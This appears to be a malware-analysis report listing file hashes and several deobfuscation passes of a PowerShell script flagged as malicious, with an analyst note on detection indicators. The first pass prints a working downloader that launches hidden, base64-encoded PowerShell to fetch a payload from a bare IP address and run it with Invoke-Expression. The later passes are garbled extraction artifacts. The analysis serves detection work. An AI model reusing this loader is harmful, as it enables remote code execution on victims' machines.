| Hash | Hash Value |
|---|---|
| MD5 | da9f9a2afb57086a039acd47e2a07d3a |
| Sha1 | b90c206ce8dac8c18ecb4add7cfadfd79f3d7cd6 |
| Sha256 | f7d13cb6db2aefec961d1ba8cd01a9093d2e698c4878f02646918881b46f820a |
| Sha384 | 4fa262b3d13bd7af77d0ae06cb621d9d296dbde44c37e4a46084bc7bdabeb14c7f9c678cac2f00dc4299c5aa4fdc499c |
| Sha512 | a4f12f01990b6209a07109ec0b805bec74e913dc3ecfd82fb1a0d17143635da74cb6c256f1337eb1715ad3844040abbc117ca1d7aa7cca5534f58318a2862331 |
| SSDeep | 12:ZdKV1DwvziBncm0JNPTlOeAH+LgyaICQkmMhA9nCEFoI1kD8:ZAV1DwvH71lOe0+LAQshAlPqD8 |
| TLSH | A5F00E034F0769AACB96C2CAE0029800EC6E1936230638213DD09E602ECC4ECE032AF9 |
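
Note: the four rows below appear to be successive deobfuscation passes over the same script, not four different scripts. Only the first row keeps the `@" … "@` here-string that holds the downloader. In the later rows the here-string body is printed as bare statements, `$psCode` is shown as `""`, `$u` is never assigned, a stray `"@` is left behind and several names are lower-cased, so treat those differences as tool artifacts. The first row is the one to build detections from: `powershell.exe` started with `-NoProfile -WindowStyle Hidden -EncodedCommand`, an `MSXML2.XMLHTTP` COM object doing a synchronous GET over plain HTTP to a bare IP address, and `Invoke-Expression` applied to the response body. The `??????` in the error string is probably non-ASCII text that was lost in extraction.

| Name0 | Value |
|---|---|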
| Deobfuscated PowerShell | $url = "http://77.90.60.32/y.GRE" $psCode = @"$u = '$url' $h = New-Object -ComObject ('MSXML2.XMLHTTP'); $h.Open('GET', $u, $false); $h.Send(); if ($h.Status -eq 200) { Invoke-Expression $h.ResponseText } else { Write-Error ('??????: ' + $h.Status) }"@ $encoded = [Convert]::"ToBase64String"([Encoding]::"Unicode"."GetBytes"($psCode)) Start-Process "powershell.exe" -ArgumentList "-NoProfile -WindowStyle Hidden -EncodedCommand $encoded" |
| Deobfuscated PowerShell | $url = "http://77.90.60.32/y.GRE" $psCode = "" $h = New-Object -ComObject "MSXML2.XMLHTTP" $h."Open"("GET", $u, $false) $h."Send"() if ($h."Status" -eq 200) { Invoke-Expression $h."ResponseText" } else { Write-Error ("??????: " + $h."Status") } "@ $encoded = [Convert]::" tobase64string([encoding]::unicode.getbytes($pscode)) start-process powershell.exe -argumentlist -noprofile -WindowStyle "Hidden" -EncodedCommand $encoded |
| Deobfuscated PowerShell | $url = "http://77.90.60.32/y.GRE" $psCode = "" $h = New-Object -ComObject "MSXML2.XMLHTTP" $h."Open"("GET", $u, $false) $h."Send"() if ($h."Status" -eq 200) { Invoke-Expression $h."ResponseText" } else { Write-Error ("??????: " + $h."Status") } "@ $encoded = [Convert]::" tobase64string ([encoding]::"unicode"."getbytes"($pscode)) Start-Process "powershell.exe" -argumentlist -noprofile -WindowStyle "Hidden" -EncodedCommand $encoded |
| Deobfuscated PowerShell | $url = "http://77.90.60.32/y.GRE" $psCode = "" $h = New-Object -ComObject "MSXML2.XMLHTTP" $h."Open"("GET", $u, $false) $h."Send"() if ($h."Status" -eq 200) { Invoke-Expression $h."ResponseText" } else { Write-Error ("??????: " + $h."Status") } "@ $encoded = [Convert]::" tobase64string ([encoding]::"unicode"."getbytes"($pscode)) Start-Process "powershell.exe" -argumentlist -noprofile -WindowStyle "Hidden" -EncodedCommand $encoded |

| Name0 | Value | Location |
|---|---|---|
| Deobfuscated PowerShell | $url = "http://77.90.60.32/y.GRE" $psCode = @"$u = '$url' $h = New-Object -ComObject ('MSXML2.XMLHTTP'); $h.Open('GET', $u, $false); $h.Send(); if ($h.Status -eq 200) { Invoke-Expression $h.ResponseText } else { Write-Error ('??????: ' + $h.Status) }"@ $encoded = [Convert]::"ToBase64String"([Encoding]::"Unicode"."GetBytes"($psCode)) Start-Process "powershell.exe" -ArgumentList "-NoProfile -WindowStyle Hidden -EncodedCommand $encoded" Malicious | da9f9a2afb57086a039acd47e2a07d3a |
| Deobfuscated PowerShell | $url = "http://77.90.60.32/y.GRE" $psCode = "" $h = New-Object -ComObject "MSXML2.XMLHTTP" $h."Open"("GET", $u, $false) $h."Send"() if ($h."Status" -eq 200) { Invoke-Expression $h."ResponseText" } else { Write-Error ("??????: " + $h."Status") } "@ $encoded = [Convert]::" tobase64string([encoding]::unicode.getbytes($pscode)) start-process powershell.exe -argumentlist -noprofile -WindowStyle "Hidden" -EncodedCommand $encoded Malicious | da9f9a2afb57086a039acd47e2a07d3a > [Deobfuscated PS] |
| Deobfuscated PowerShell | $url = "http://77.90.60.32/y.GRE" $psCode = "" $h = New-Object -ComObject "MSXML2.XMLHTTP" $h."Open"("GET", $u, $false) $h."Send"() if ($h."Status" -eq 200) { Invoke-Expression $h."ResponseText" } else { Write-Error ("??????: " + $h."Status") } "@ $encoded = [Convert]::" tobase64string ([encoding]::"unicode"."getbytes"($pscode)) Start-Process "powershell.exe" -argumentlist -noprofile -WindowStyle "Hidden" -EncodedCommand $encoded Malicious | da9f9a2afb57086a039acd47e2a07d3a > [Deobfuscated PS] > [Deobfuscated PS] |
| Deobfuscated PowerShell | $url = "http://77.90.60.32/y.GRE" $psCode = "" $h = New-Object -ComObject "MSXML2.XMLHTTP" $h."Open"("GET", $u, $false) $h."Send"() if ($h."Status" -eq 200) { Invoke-Expression $h."ResponseText" } else { Write-Error ("??????: " + $h."Status") } "@ $encoded = [Convert]::" tobase64string ([encoding]::"unicode"."getbytes"($pscode)) Start-Process "powershell.exe" -argumentlist -noprofile -WindowStyle "Hidden" -EncodedCommand $encoded Malicious | da9f9a2afb57086a039acd47e2a07d3a > [Deobfuscated PS] > [Deobfuscated PS] > [Deobfuscated PS] |